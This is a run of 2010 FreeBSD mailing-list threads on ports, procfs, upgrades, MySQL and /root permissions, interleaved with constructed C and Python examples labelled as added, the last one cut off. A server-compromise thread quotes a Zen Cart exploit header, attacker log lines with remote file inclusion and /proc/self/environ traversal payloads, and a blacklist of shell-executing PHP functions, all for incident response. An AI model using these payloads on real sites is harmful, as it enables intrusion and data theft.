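            if (strcmp(parsed.caps[i].name, name) == 0)
                return &parsed.caps[i];
    return NULL;
}

const char *long_name(const char *text)   /* last, descriptive name, or NULL */
{
    return parse_record(text, &parsed) == 0 ? parsed.names[parsed.nnames - 1] : NULL;
}

int main(void)
{
    printf("handbook accounts_title type: %c\n", lookup_cap(HANDBOOK, "accounts_title")->type);
    printf("release long name: %s\n", long_name(RELEASE));
    return 0;
}
```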


Re: devel/poco-ssl BROKEN. Can I use TRYBROKEN?

2010-02-01 Thread cpghost
On Sun, Jan 31, 2010 at 03:09:26PM -0500, b. f. wrote:
  Hi,
  
  devel/poco-ssl has been marked
BROKEN= bad plist
  for some time now.
 
  Since I urgently need it for devel work, and as I would prefer
  to use the port rather than compile POCO directly (which works
  too), I'm considering bypassing this BROKEN setting with:
 
   .if ${.CURDIR:M*/devel/poco-ssl}
   TRYBROKEN=yes
   .endif
 
  in /etc/make.conf.
 
  Is it okay, until devel/poco-ssl is fixed?
 
 You can do whatever you want on your own system.  The reason given
 for marking it BROKEN was a bad plist, and if that is the only thing
 wrong with it, then you need only worry about it leaving unregistered
 files behind after it is removed, or possibly conflicting with another
 port.  If that's alright with you, then you may as well use NO_IGNORE
 or TRYBROKEN as a workaround.

Okay, I've tried it on a test machine, and it seems to work
alright (so far), at least with the few programs I've compiled.
It looks like a bad plist only, and I think that I understand
the ramifications of it, so I'll stick to this workaround until
the port is fixed.

  Oh, btw, I'm still missing the poco-doc port which pulls in
  the POCO documentation. :-(
 
 Oh, well.  If the maintainer won't do it, maybe you could take the
 time to fix the plist and offer an option to install the docs?

I'll have a look as soon as I grok the ports system and find
out how to do that. ;-)

Thanks,
-cpghost.

-- 
Cordula's Web. http://www.cordula.ws/


Re: A question on syntax in /etc/login.conf

2010-02-01 Thread Giorgos Keramidas
On Mon, 01 Feb 2010 12:00:59 +0100, Leslie Jensen les...@eskk.nu wrote:
 On the page

 http://www.se.freebsd.org/doc/en_US.ISO8859-1/books/handbook/using-localization.html

 Syntax is shown as:

 language_name:accounts_title:\
 :charset=MIME_charset:\
 :lang=locale_name:\
 :tc=default:

 If I look in the file on a newly installed 8.0-RELEASE it shows:

 russian|Russian Users Accounts:\
 :charset=KOI8-R:\
 :lang=ru_RU.KOI8-R:\
 :tc=default:

 Is it the colon or pipe sign that is correct?
On Mon, 01 Feb 2010 12:16:06 +, Matthew Seaman 
m.sea...@infracaninophile.co.uk wrote:
 Probably the latter.  The '|' symbol is used when there are several
 alternative names for the same object -- this is not used much in
 /etc/login.conf, unlike /etc/termcap.  By convention, the last name in
 a list of alternates like this is a comment rather than a tag for
 actual use.  See getcap(3) for details.

 The first entry is syntactically correct -- 'accounts_title' would be
 a boolean value (set to true if present, false if absent) -- but the
 login.conf man page knows nothing of 'accounts_title' and it's a funny
 name for a boolean. So I guess that's likely to be a typo in the
 handbook.

Yes, this is a typo in the Handbook.  I just committed a fix for the
typo in revision 1.132 of doc/en_US.ISO8859-1/books/handbook/l10n/chapter.sgml

  
  revision 1.132
  date: 2010/02/01 12:52:51;  author: keramida;  state: Exp;  lines: +2 -2
  Fix typo in login.conf example.  The aliases for login.conf entries are
  separated by the main name with a pipe '|', and there is no support for
  an accounts_type key in the database.  Use a whitespace-separated name
  in the example, to indicate that it's ok to have spaces in login.conf
  entry aliases.

  Noticed by: Leslie Jensen, leslie at eskk.nu,
  Matthew Seaman, m.seaman at infracaninophile.co.uk
  

Thanks for bringing this to our attention :)





Re: VirtualBox doesn't start

2010-02-01 Thread Frank Wißmann

Hi, Daniel!

Daniel Bye wrote:

On Sun, Jan 31, 2010 at 08:39:49PM +0100, Frank Wißmann wrote:

Hi, Glen!

Glen Barber wrote:


 2.) What version of VirtualBox is this?  virtualbox-ose-3.1.2 and above
 do not require procfs(5); lesser versions do.
When I try to mount /proc via fstab and mount -u -a I get the 
following error message:


mount: proc : Invalid argument

The line in /etc/fstab is as following:

proc /proc procfs rw 0 0


procfs  /proc   procfs  rw  0   0
^^


After trying this I still get the message:

mount: procfs : Operation not supported

And a

mount -t procfs /proc/

does the following:

usage: mount [-adflpruvw] [-F fstab] [-o options] [-t ufs | external_type]
   mount [-dfpruvw] special | node
   mount [-dfpruvw] [-o options] [-t ufs | external_type] special node

So, what is wrong with me :-(?

Greetings Frank

--
GU d- s:+ a+ C+$ UBS$ P L- !E--- W N+@ !o K--? !w--- O !M- !V- PS+ PE 
Y? !PGP- t+ 5 X !R tv- b++ DI !D G e h+ r- y?


When pack meets pack in the jungle
and no one will move from the trail
wait till the leaders have spoken
it may be fair words shall prevail

(Rudyard Kipling)


Re: Help! Upgrade from fbsd 5.4 to 8.x

2010-02-01 Thread Ruben de Groot
On Sun, Jan 31, 2010 at 09:33:51AM +0100, Roland Smith typed:
 On Sat, Jan 30, 2010 at 11:08:05PM -0500, Jeff Mitchell wrote:
 
  o Some of the executables on this box are without source but I 
  still need them to run; short of moving them to a VM and doing some 
  voodoo, what are the chances a binary built for fbsd 5.x works fine in 
  8.x? (earlier fbsd's had the break between gcc versions, but I'm rather 
 
 The GENERIC kernel in 8.0 comes with the COMPAT_FREEBSD5 option by default, so
 the only thing you need to do is to install the misc/compat5x port.

That is, if the executables weren't dependent on compat[2-4] options in the 
kernel on the old server ;)

  3 - yank the drive, slap a giant new fat drive in there, do a full 
  fbsd 8.0 install, and then migration from old drive as needed
 
 Definitely #3.

Yes, you could even try copying the entire old disk to a subdirectory and
running that as a jail. Should bring you up quickly, giving you more time
to migrate all applications proper.

Ruben


Re: VirtualBox doesn't start

2010-02-01 Thread Glen Barber
Hi Frank,

Frank Wißmann wrote: 
 After trying this I still get the message:
 
 mount: procfs : Operation not supported
 
 And a
 
 mount -t procfs /proc/
 

The procfs(5) man page specifies the following:

mount -t procfs proc /proc

Regards,

-- 
Glen Barber


Re: VirtualBox doesn't start

2010-02-01 Thread Frank Wißmann

Hi, Glen!

Glen Barber wrote:

Hi Frank,

Frank Wißmann wrote: 

After trying this I still get the message:

mount: procfs : Operation not supported

And a

mount -t procfs /proc/



The procfs(5) man page specifies the following:

mount -t procfs proc /proc


Once you make it right, it works.

mount:
/dev/ad1s1a on / (ufs, local)
devfs on /dev (devfs, local, multilabel)
/dev/ad0s1d on /home (ufs, local)
/dev/ad1s1e on /usr (ufs, local, soft-updates)
/dev/ad1s1f on /usr/local (ufs, local, soft-updates)
/dev/ad1s1h on /usr/obj (ufs, local, soft-updates)
/dev/ad1s2d on /usr/ports (ufs, local, soft-updates)
/dev/ad1s1g on /usr/src (ufs, local, soft-updates)
/dev/ad1s1d on /var (ufs, local, soft-updates)
procfs on /proc (procfs, local)

Thank you, folks! But I think I go the way of reinstalling with an 
updated ports-tree and Qt4 enabled.


Greetings Frank

--
GU d- s:+ a+ C+$ UBS$ P L- !E--- W N+@ !o K--? !w--- O !M- !V- PS+ PE 
Y? !PGP- t+ 5 X !R tv- b++ DI !D G e h+ r- y?


When pack meets pack in the jungle
and no one will move from the trail
wait till the leaders have spoken
it may be fair words shall prevail

(Rudyard Kipling)


Re: Help! Upgrade from fbsd 5.4 to 8.x

2010-02-01 Thread Jeff Mitchell
On Mon, 1 Feb 2010, Ruben de Groot wrote:

#  The GENERIC kernel in 8.0 comes with the COMPAT_FREEBSD5 option by default,
#  so the only thing you need to do is to install the misc/compat5x port.
# 
# That is, if the executables weren't dependent on compat[2-4] options in the
# kernel on the old server ;)

Hahahahaha haha   h ... erm :/ We'll see :)

# Yes, you could even try copying the entire old disk to a subdirectory and
# running that as a jail. Should bring you up quickly, giving you more time
# to migrate all applications proper.

I considered this (or just VMing the whole box), but I'd still be 
going through to trim out the union of ports (ie: ssh common port etc), so 
heck with it.

I do think I'm going to jail like mad this time through though; 
ie: stick apache into a jail, stick groupware server into a jail, stick 
mailing list into a jail, etc; for things that are well defined and should 
be something considered for peeling to another server some day, just jail 
them outright from the onset .. better security and help keep me from 
bleeding lines between services. Good tip :)

Not that I've set up a jail before, but now's as good a time as any 
to learn :)

jeff

--
If everyone would put barbecue sauce on their food, there would be no war.


Re: mysql silently failing to start - suggestions?

2010-02-01 Thread Greg Larkin

John wrote:
 If this isn't the right list - if I should try another let me know -
 but since this is the mysql-server-5.4.2 package, and since you
 folks have been so helpful, I thought I'd give it a go.
 
 Anyway, the system is 8.0-RELEASE and that package is installed,
 and I can't start the server.  Not only can I not start the server,
 but it's not giving me a clue.  I can't find anything anywhere.
 Not in /var/log/messages, not anywhere.  When I run
 /usr/local/etc/rc.d/mysqlserver start
 it says Starting mysql., pauses for several seconds (I don't see
 anything go by in top) and then the script exits.  At that point,
 one would expect, there's no /tmp/mysql.sock, there's nothing
 in messages or anywhere else.  With nothing to go on, well, I don't
 know where to start.  Any suggestions?

Hi John,

If I'm having problems with an rc.d script, I'll invoke it with shell
verbosity turned on so I can see exactly what commands are executing.
You might try that if the other posted suggestions don't fix the problem.

Invoke the script like this:

sh -x /usr/local/etc/rc.d/mysqlserver start

Hope that helps,
Greg
-- 
Greg Larkin

http://www.FreeBSD.org/   - The Power To Serve
http://www.sourcehosting.net/ - Ready. Set. Code.
http://twitter.com/sourcehosting/ - Follow me, follow you


ATT substitute available on freebsd?

2010-02-01 Thread Jian Jun Wang
hi everybody,

I am not quite technical on this, y'know, in windows, we have ATT software
to access company intranet, not sure whether we have substitute here? I
tried to figure out the ways to do that, no luck. I know on linux
distribution they have agnclient. any ideas?

thank you!
-- 
TNT - Today, Not Tomorrow


Re: ATT substitute available on freebsd?

2010-02-01 Thread Ivan Voras

On 02/01/10 15:37, Jian Jun Wang wrote:

hi everybody,

I am not quite technical on this, y'know, in windows, we have ATT software
to access company intranet, not sure whether we have substitute here? I
tried to figure out the ways to do that, no luck. I know on linux
distribution they have agnclient. any ideas?


You can expect a reliable answer only if someone has figured out what 
protocol your software uses and has found some alternative.


Offhand, since 
http://info.attbusiness.net/agnclient/index.cfm?fuseaction=home.features 
mentions ipsec, I'd guess IPSec support might be your answer 
(http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/ipsec.html).




Re: ATT substitute available on freebsd?

2010-02-01 Thread Dan Nelson
In the last episode (Feb 01), Ivan Voras said:
 On 02/01/10 15:37, Jian Jun Wang wrote:
  I am not quite technical on this, y'know, in windows, we have ATT
  software to access company intranet, not sure whether we have substitute
  here?  I tried to figure out the ways to do that, no luck.  I know on
  linux distribution they have agnclient.  any ideas?
 
 You can expect a reliable answer only if someone has figured out what
 protocol does your software use and has found some alternative.
 
 Offhand, since 
 http://info.attbusiness.net/agnclient/index.cfm?fuseaction=home.features 
 mentions ipsec, I'd guess IPSec support might be your answer 
 (http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/ipsec.html).

Also, looking at the posts on the Linux client support forum, ATT is just
barely supporting the Linux client as it is (SSL VPN only, no IPSEC support
planned, only three OS versions supported).  You will probably be better off
running a small Windows XP vm inside VirtualBox and using the Windows client
from that.

http://www.attnetclient.com/forum/viewtopic.php?f=12t=894#p3036
http://www.attnetclient.com/forum/viewtopic.php?f=12t=951#p3239

-- 
Dan Nelson
dnel...@allantgroup.com


Re: Server compromised Zen-Cart record company Exploit

2010-02-01 Thread James Smallacombe


(please reply-all; I am not sub'd and sorry for the top posting):

I have safe_mode off due to popular demand.  So many customer apps demand 
that it be kept off.  In fact, here is a post from one of the Zen people 
on the Zen-cart forum.  In light of this exploit, this might be a little 
ironic:


http://www.zen-cart.com/forum/showthread.php?t=76740

There is one for-sure patch: Turn off safe-mode.

Keep in mind that future versions of PHP will *not* even include a 
safe-mode ... because it's a weak bandage giving a false sense of security 
to hosts who don't otherwise know how to properly secure their servers.


This begs the question: why? ie: why would you want to run your online 
business on a server that's got to use safe-mode in order to think they're 
securing the server?


I'm not trying to badmouth your server administrator; rather I'm 
attempting to strongly make the point that unless safe-mode is being used 
for a very specific reason for which there is no other solution (an 
unlikely situation), it shouldn't be used. And, if it is being used, you 
shouldn't run your business there, because there will be other security 
issues to which you'll be vulnerable but never have a clue about it until 
disaster strikes, because the big picture of security protection has been 
poorly implemented.


That said, Zen Cart will install and run even if Safe Mode is active; 
however, you run the risk of certain features not working with or without 
notice, and the unexpected appearance of warning or fatal errors while 
customers are using the site. And then there's the issue of the admin side 
needing to do various things that safe-mode doesn't like.


So, I guess, in short ... you can do it, but you do so at your own risk.

Maybe that's more than you wanted to hear ... sorry


From:  Bogdan Webb bog...@pgn.ro

try php's safe_mode but it is likely to keep the hackers off, indeed they
can get in and snatch some data but they would be kept out of a shell's
reach... but sometimes safe_mode is not enough... try considering Suhosin
but the addon not the patch... and define the
suhosin.executor.func.blacklist which will deny use of certain php commands
that allow shell execution... but keep in mind it's impossible to prevent
all breaches... this php patch will only keep the hacker kiddos off but
there's still a good chance it can be broken... stay safe !

ref's:
http://www.hardened-php.net/suhosin.127.html
http://beta.pgn.ro/phps/phpinfo.php


On Sun, 31 Jan 2010, James Smallacombe wrote:



Whoever speculated that my server may have been compromised was on to 
something (see bottom).  The good news is, it does appear to be contained to 
the www unprivileged user (with no shell).  The bad news is, they can still 
cause a lot of trouble.  I found the compromised customer site and chmod 0 
their cart (had php binaries called core(some number).php that gave the 
hacker a nice browser screen to cause all kinds of trouble)


Not sure if this is related to the UDP floods, but if not, it's a heck of a 
coincidence.  At times, CPU went through the roof for the www user, mostly 
running some sort of perl scripts (nothing in the suexec-log).  I would kill 
apache, but couldn't restart it as it would show port 80 in use.  I would 
have to manually kill processes like these:


www  70471  1.4  0.1  6056  3824  ??  R  4:21PM   0:44.75 [eth0] (perl)
www  70470  1.2  0.1  6060  3828  ??  R  4:21PM   0:44.50 [bash] (perl)
www  64779  1.0  0.1  6056  3820  ??  R 4:07PM   2:24.34
/sbin/klogd -c 1 -x -x (perl)
www   70472  1.0  0.1  6060  3828  ??  R 4:21PM   0:44.84

I could not find ANY file named klogd on the system, let alone in /sbin. 
Clues as to how to dig myself out of this are appreciated


I found this in /tmp/bx1.txt:

--More--(5%)#!/usr/bin/php
?php

#
# --- Zen Cart 1.3.8 Remote Code Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of 
anyone!

# A new version (1.3.8a)  is avaible on http://www.zen-cart.com/
#
# BlackH :)
#

error_reporting(E_ALL ^ E_NOTICE);
if($argc  2)
{
echo 
=___ Zen Cart 1.3.8 Remote Code Execution Exploit  =

|  BlackH bl4c...@gmail.com  |

|  |
| \$system php $argv[0] url|
| Notes: url  ex: http://victim.com/site (no slash)  |
|  |

;exit(1);

---  snipped --

It is dated from two nights ago, after these issues started, but it's 
nonetheless alarming.  Security Focus is aware of the issue and refers you to 
Zen for the fix.  Only problem is, 
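
An added triage example for the process listing quoted in the message above; it is not part of the thread. It assumes FreeBSD ps(1) output in `ps aux` column order, where ps appends the kernel-recorded command name in parentheses when it differs from the argument vector the process presents; the function names and the two benign sample rows are this example's own.

```python
import os
import re

# Constructed sample: the three complete ps lines quoted in the message above
# (the wrapped klogd line rejoined) plus two constructed benign processes.
SAMPLE_PS = """\
www  70471  1.4  0.1  6056  3824  ??  R  4:21PM   0:44.75 [eth0] (perl)
www  70470  1.2  0.1  6060  3828  ??  R  4:21PM   0:44.50 [bash] (perl)
www  64779  1.0  0.1  6056  3820  ??  R  4:07PM   2:24.34 /sbin/klogd -c 1 -x -x (perl)
www    812  0.0  0.2  9000  4100  ??  S  3:00PM   0:01.10 /usr/local/sbin/httpd -k start
root   640  0.0  0.1  3500  1200  ??  Ss 1:00PM   0:00.20 sendmail: accepting connections (sendmail)
"""

# "<what the process displays> (<accounting name>)" at the end of COMMAND.
TRAILING_NAME = re.compile(r"^(?P<shown>.*\S)\s+\((?P<real>[^()\s]+)\)$")


def parse_ps_line(line):
    """Split one `ps aux` row into user, pid, displayed command, real name."""
    parts = line.split(None, 10)  # ten fixed columns, then COMMAND
    if len(parts) < 11 or not parts[1].isdigit():
        return None  # header row or a wrapped/truncated line
    command = parts[10].strip()
    match = TRAILING_NAME.match(command)
    shown, real = match.group("shown", "real") if match else (command, None)
    return {"user": parts[0], "pid": int(parts[1]), "shown": shown, "real": real}


def displayed_name(shown):
    """Program name the process claims: argv[0] without path, [] or ':'."""
    argv0 = shown.split()[0]
    return os.path.basename(argv0.strip("[]").rstrip(":"))


def is_masquerading(proc):
    """True when the displayed name and the accounting name disagree."""
    if proc["real"] is None:
        return False  # ps reported no separate accounting name
    name = displayed_name(proc["shown"])
    if not name:
        return True
    # Prefix match tolerates versioned interpreters such as perl / perl5.8.9.
    return not (proc["real"].startswith(name) or name.startswith(proc["real"]))


def find_masquerading(ps_text, user=None):
    """Return (pid, displayed command, real name) for suspicious rows."""
    hits = []
    for line in ps_text.splitlines():
        proc = parse_ps_line(line)
        if proc is None or (user and proc["user"] != user):
            continue
        if is_masquerading(proc):
            hits.append((proc["pid"], proc["shown"], proc["real"]))
    return hits


if __name__ == "__main__":
    for pid, shown, real in find_masquerading(SAMPLE_PS, user="www"):
        print(f"pid {pid}: shows as {shown!r} but is really {real}")
```

The mismatch is a triage heuristic: daemons that retitle themselves with a different program name will also be listed and need a manual look.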

Re: /root permission reset on boot

2010-02-01 Thread Lowell Gilbert
Nerius Landys nlan...@gmail.com writes:

 I'm running FreeBSD 7.1 i386, and even after I chmod 700 /root,
 after a reboot it goes back to permission 755.
 1. What's the reason for this?  There must be a good reason and I
 would like to know it.  Everything in FreeBSD just makes sense and is
 well designed (honestly, no sarcasm here).

It's something local to your machine; this doesn't happen on any machine
I've used, and I can't find anything that could be configured for that.

 2. Would I  want to change the permission of /root to 700 permanently, and 
 how?

By default, there's nothing sensitive in that directory, so there's no
reason to protect it more thoroughly than the defaults.  If you put
something in that directory, you might want to change the permissions,
but that would be up to you and your own knowledge of your system.

-- 
Lowell Gilbert, embedded/networking software engineer, Boston area
http://be-well.ilk.org/~lowell/


Re: ATT substitute available on freebsd?

2010-02-01 Thread Jian Jun Wang
thank you all for your help, I'd install virtualbox and try in XP.
best regards

On Tue, Feb 2, 2010 at 12:05 AM, Dan Nelson dnel...@allantgroup.com wrote:

 In the last episode (Feb 01), Ivan Voras said:
  On 02/01/10 15:37, Jian Jun Wang wrote:
   I am not quite technical on this, y'know, in windows, we have ATT
   software to access company intranet, not sure whether we have
 substitute
   here?  I tried to figure out the ways to do that, no luck.  I know on
   linux distribution they have agnclient.  any ideas?
 
  You can expect a reliable answer only if someone has figured out what
  protocol does your software use and has found some alternative.
 
  Offhand, since
  http://info.attbusiness.net/agnclient/index.cfm?fuseaction=home.features
  mentions ipsec, I'd guess IPSec support might be your answer
  (http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/ipsec.html).

 Also, looking at the posts on the Linux client support forum, ATT is just
 barely supporting the Linux client as it is (SSL VPN only, no IPSEC support
 planned, only three OS versions supported).  You will probably be better
 off
 running a small Windows XP vm inside VirtualBox and using the Windows
 client
 from that.

 http://www.attnetclient.com/forum/viewtopic.php?f=12t=894#p3036
 http://www.attnetclient.com/forum/viewtopic.php?f=12t=951#p3239

 --
Dan Nelson
dnel...@allantgroup.com




-- 
TNT - Today, Not Tomorrow


Re: mysql silently failing to start - suggestions?

2010-02-01 Thread Manolis Kiagias
On 01/02/2010 5:34 AM, John wrote:
 If this isn't the right list - if I should try another let me know -
 but since this is the mysql-server-5.4.2 package, and since you
 folks have been so helpful, I thought I'd give it a go.

 Anyway, the system is 8.0-RELEASE and that package is installed,
 and I can't start the server.  Not only can I not start the server,
 but it's not giving me a clue.  I can't find anything anywhere.
 Not in /var/log/messages, not anywhere.  When I run
 /usr/local/etc/rc.d/mysqlserver start
 it says Starting mysql., pauses for several seconds (I don't see
 anything go by in top) and then the script exits.  At that point,
 one would expect, there's no /tmp/mysql.sock, there's nothing
 in messages or anywhere else.  With nothing to go on, well, I don't
 know where to start.  Any suggestions?
   

Maybe a long shot, but I once had a problem starting mysql because the
sticky bit was not set on /tmp.
I had previously dump/restored the system and forgot to chmod -R 1777 /tmp
Don't remember the exact error message - if there was any - but it took
me quite some time to figure out.
Have a quick look at this.


Re: Server compromised Zen-Cart record company Exploit

2010-02-01 Thread Bogdan Webb
Indeed it's pretty tricky with safe_mode, like for certain i know that a
version of a popular r57 shell had safe_mode bypass - i was stunned to check
the shell myself on my server... and i was thinking that safe_mode is
enough... (+ i was using the Suhosin patch *which in fact does nothing
regarding straightening the php) then i came over Suhosin the addon (which
on my BSD with lighttpd it could be loaded only using Zen framework... for
unknown reasons to me) the Suhosin was configured to blacklist some basic
commands that allow php to directly run shell commands:

suhosin.executor.func.blacklist =
proc_nice,shell_exec,show_source,symlink,system,dl,highlight_file,ini_alter,ini_restore,openlog,passthru,exec

thus even if hackers find bugs in some php apps it would be harder to get a
shell... i say harder because it's impossible to prevent that - there are
mysql ways to get shell and so on ... so it's not 100% foolproof, but it's

here's some examples on how Suhosin alerts the attacks:

Jan  2 02:17:00 pgn suhosin[75216]: ALERT - tried to register forbidden
variable '_SERVER[DOCUMENT_ROOT]' through GET variables (attacker
'91.121.75.82', file '/usr/home//pgnlinks/index.php')

Dec 16 23:43:36 pgn suhosin[87560]: ALERT - function within blacklist
called: shell_exec() (attacker '86.122.161.162', file
'/usr/home//pvpwww/junkforum/Sources/Subs.php', line 3531)

*note - these are logs from /var/log/messages and the last message is a
false-positive (i think it's called that way) it's a basic function of SMF
board to check the DNS with a linux command, but i just wanted to point out
how it handles the blacklist...

here's a more detailed info regarding attacks (attempts) stored in the
webserver's log file (in my case lighttpd):

2010-01-19 02:21:53: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL
chars not allowed within request variables - dropped variable 'list'
(attacker '189.26.208.35', file '/usr/home//pgnlinks/index.php')
2010-01-19 02:21:54: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL
chars not allowed within request variables - dropped variable 'c' (attacker
'189.26.208.35', file '/usr/home//pgnlinks/index.php')

189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] GET
/index.php?list=http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1 302 0 -
Mozilla/3.0 (compatible; Indy Library)
189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] GET /index.php?c=
http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1 200 3304 - Mozilla/3.0
(compatible; Indy Library)
189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:53 +0200] GET
/index.php?list=../../../../../../../../../../../../../../../proc/self/environ%00
HTTP/1.1 200 3307 - Mozilla/3.0 (compatible; Indy Library)
189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:54 +0200] GET
/index.php?c=../../../../../../../../../../../../../../../proc/self/environ%00
HTTP/1.1 200 3306 - Mozilla/3.0 (compatible; Indy Library)


My server has safe_mode off - because it's not needed (at least in my mind... i
might be mistaken) and check out the phpinfo.php file i've got and see the
Suhosin settings

stay safe!
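
An added log-triage example for the Suhosin alerts and lighttpd access-log entries shown in the message above; it is not part of the thread. The sample lines are constructed in the same formats (documentation-range addresses, a placeholder host, mail wrapping removed, quotes around the request line assumed), and the function names and finding labels are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines modelled on the formats quoted above.
SUHOSIN_LOG = """\
Jan  2 02:17:00 host suhosin[75216]: ALERT - tried to register forbidden variable '_SERVER[DOCUMENT_ROOT]' through GET variables (attacker '198.51.100.7', file '/usr/home/site/index.php')
Dec 16 23:43:36 host suhosin[87560]: ALERT - function within blacklist called: shell_exec() (attacker '192.0.2.44', file '/usr/home/forum/Sources/Subs.php', line 3531)
2010-01-19 02:21:53: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'list' (attacker '203.0.113.35', file '/usr/home/site/index.php')
"""
ACCESS_LOG = """\
203.0.113.35 www.example.org - [19/Jan/2010:02:20:43 +0200] "GET /index.php?list=http://example.invalid/cmd.txt? HTTP/1.1" 302 0 "-" "Mozilla/3.0 (compatible; Indy Library)"
203.0.113.35 www.example.org - [19/Jan/2010:02:21:53 +0200] "GET /index.php?list=../../../../proc/self/environ%00 HTTP/1.1" 200 3307 "-" "Mozilla/3.0 (compatible; Indy Library)"
192.0.2.200 www.example.org - [19/Jan/2010:02:25:00 +0200] "GET /index.php?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

ALERT = re.compile(
    r"ALERT - (?P<msg>.*) \(attacker '(?P<ip>[^']+)', file '(?P<file>[^']+)'"
    r"(?:, line (?P<line>\d+))?\)\s*$"
)
ALERT_KINDS = [
    (re.compile(r"function within blacklist called"), "blacklisted_function"),
    (re.compile(r"ASCII-NUL chars not allowed"), "nul_byte"),
    (re.compile(r"tried to register forbidden variable"), "forbidden_variable"),
]
ACCESS = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r"(?P<status>\d{3})\b"
)
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def parse_alert(line):
    """Extract kind, client address, script path and line from one ALERT."""
    m = ALERT.search(line)
    if not m:
        return None
    kind = next((k for rx, k in ALERT_KINDS if rx.search(m.group("msg"))), "other")
    line_no = int(m.group("line")) if m.group("line") else None
    return {"kind": kind, "ip": m.group("ip"), "file": m.group("file"), "line": line_no}


def classify_request(target):
    """Label query-string values that look like file-inclusion probes."""
    findings = set()
    query = urlsplit(target).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL.match(value):
            findings.add("remote-url-in-parameter")
        if "../" in value:
            findings.add("path-traversal")
        if "\x00" in value:  # parse_qsl has already decoded %00
            findings.add("nul-byte")
    return findings


def triage(suhosin_text, access_text):
    """Group Suhosin alerts and suspicious requests by client address."""
    report = defaultdict(lambda: {"alerts": [], "requests": set()})
    for line in suhosin_text.splitlines():
        alert = parse_alert(line)
        if alert:
            report[alert["ip"]]["alerts"].append(alert["kind"])
    for line in access_text.splitlines():
        m = ACCESS.match(line)
        found = classify_request(m.group("target")) if m else set()
        if found:
            report[m.group("ip")]["requests"] |= found
    return dict(report)


if __name__ == "__main__":
    for ip, entry in sorted(triage(SUHOSIN_LOG, ACCESS_LOG).items()):
        print(ip, entry["alerts"], sorted(entry["requests"]))
```

A `blacklisted_function` alert carries the script path and line number, which is what lets an application's own call (the false positive mentioned above) be told apart from injected code.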


using leds on laptop

2010-02-01 Thread Eitan Adler
My laptop has a led for wireless - It has never been used since I
installed freeBSD on this laptop. I was wondering if there was a way I could
figure out a) if freeBSD detects it b) a way to use it for something


Re: /root permission reset on boot

2010-02-01 Thread Nerius Landys
 I'm running FreeBSD 7.1 i386, and even after I chmod 700 /root,
 after a reboot it goes back to permission 755.
 1. What's the reason for this?  There must be a good reason and I
 would like to know it.  Everything in FreeBSD just makes sense and is
 well designed (honestly, no sarcasm here).

 It's something local to your machine; this doesn't happen on any machine
 I've used, and I can't find anything that could be configured for that.

Perhaps I was mistaken about this happening after every reboot.
Perhaps it only happens when I upgrade my world (make buildworld, make
installworld, etc.).  I do this often (every time a release patch is
released).

So, perhaps this only happens during these upgrades?


Re: /root permission reset on boot

2010-02-01 Thread Kevin Kinsey

Nerius Landys wrote:

I'm running FreeBSD 7.1 i386, and even after I chmod 700 /root,
after a reboot it goes back to permission 755.
1. What's the reason for this?  There must be a good reason and I
would like to know it.  Everything in FreeBSD just makes sense and is
well designed (honestly, no sarcasm here).

It's something local to your machine; this doesn't happen on any machine
I've used, and I can't find anything that could be configured for that.


Perhaps I was mistaken about this happening after every reboot.
Perhaps it only happens when I upgrade my world (make buildworld, make
installworld, etc.).  I do this often (every time a release patch is
released).

So, perhaps this only happens during these upgrades?


Yup, 99% sure of that.

Kevin Kinsey


Re: /root permission reset on boot

2010-02-01 Thread Dan Nelson
In the last episode (Feb 01), Nerius Landys said:
  I'm running FreeBSD 7.1 i386, and even after I chmod 700 /root, after
  a reboot it goes back to permission 755.  1.  What's the reason for
  this?  There must be a good reason and I would like to know it. 
  Everything in FreeBSD just makes sense and is well designed (honestly,
  no sarcasm here).
 
  It's something local to your machine; this doesn't happen on any machine
  I've used, and I can't find anything that could be configured for that.
 
 Perhaps I was mistaken about this happening after every reboot.  Perhaps
 it only happens when I upgrade my world (make buildworld, make
 installworld, etc.).  I do this often (every time a release patch is
 released).
 
 So, perhaps this only happens during these upgrades?

I was going to point blame at mtree, but the file for the root filesystem
( /etc/mtree/BSD.root.dist ) just lists /root without forcing a mode value.

You could probably use either dtrace or the audit system to log exactly when
the permissions get changed.

-- 
Dan Nelson
dnel...@allantgroup.com


Re: /root permission reset on boot

2010-02-01 Thread Lowell Gilbert
Nerius Landys nlan...@gmail.com writes:

 I'm running FreeBSD 7.1 i386, and even after I chmod 700 /root,
 after a reboot it goes back to permission 755.
 1. What's the reason for this?  There must be a good reason and I
 would like to know it.  Everything in FreeBSD just makes sense and is
 well designed (honestly, no sarcasm here).

 It's something local to your machine; this doesn't happen on any machine
 I've used, and I can't find anything that could be configured for that.

 Perhaps I was mistaken about this happening after every reboot.
 Perhaps it only happens when I upgrade my world (make buildworld, make
 installworld, etc.).  I do this often (every time a release patch is
 released).

 So, perhaps this only happens during these upgrades?

Yes, that makes more sense.  Just change the setting in 
/etc/mtree/BSD.root.dist.

-- 
Lowell Gilbert, embedded/networking software engineer, Boston area
http://be-well.ilk.org/~lowell/
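
An added example for the mtree discussion in this thread; it is not part of the thread. In mtree(5) a `/set` line supplies default keywords, so an entry that carries no `mode=` of its own still has an effective mode; the code resolves that for a path in a constructed spec excerpt and compares it with a mode set by hand. The function names are this example's own.

```python
# Constructed excerpt in mtree(5) specification format, laid out like a
# root-filesystem spec; it is not a copy of any release's BSD.root.dist.
SAMPLE_SPEC = """\
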